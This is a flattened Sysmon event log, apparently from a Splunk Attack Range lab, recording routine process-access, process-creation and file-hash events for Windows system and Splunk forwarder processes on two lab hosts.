09:13:26.985{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979155Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979154Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979153Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979152Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979151Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979150Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979149Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979148Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8B36-6151-D079-00000000FD01}2456C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979147Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.985{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B36-6151-D079-00000000FD01}2456C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979146Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.971{69CF5F33-8B36-6151-D079-00000000FD01}2456C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979145Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.923{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26D6BEF1F57A311687DFBA6D62870AB8,SHA256=53A1982CD9ADE28252EF20A0ECA2B91072213D73EAAC361A8B35D4251574E883,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979144Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.829{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3ABA56D49B2C6BB2224E988DB7B9E7C,SHA256=A0B2B1EEB969D6850E68964C15EEBF9AE2A61FD6AF8452E3DDCFD9B49707235D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979143Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.579{69CF5F33-8B36-6151-CF79-00000000FD01}40603888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:26.917{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6A3FD4F66B4DF7704D63D6DD457BB8E,SHA256=E810BBFDF54DBC0A37F23A046380E622B83D02166A40F81F2A21208438753B45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:26.265{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=452E735B884DD0C115BE3C7B4BA0187F,SHA256=CD6C1681E2CF1141E6FAA4CC3BE626D858F3D876F848FCE4EBDE91E48CE101A5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979142Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8B36-6151-CF79-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979141Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979140Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979139Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979138Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979137Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979136Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979135Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979134Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979133Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979132Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8B36-6151-CF79-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979131Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:26.392{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8B36-6151-CF79-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 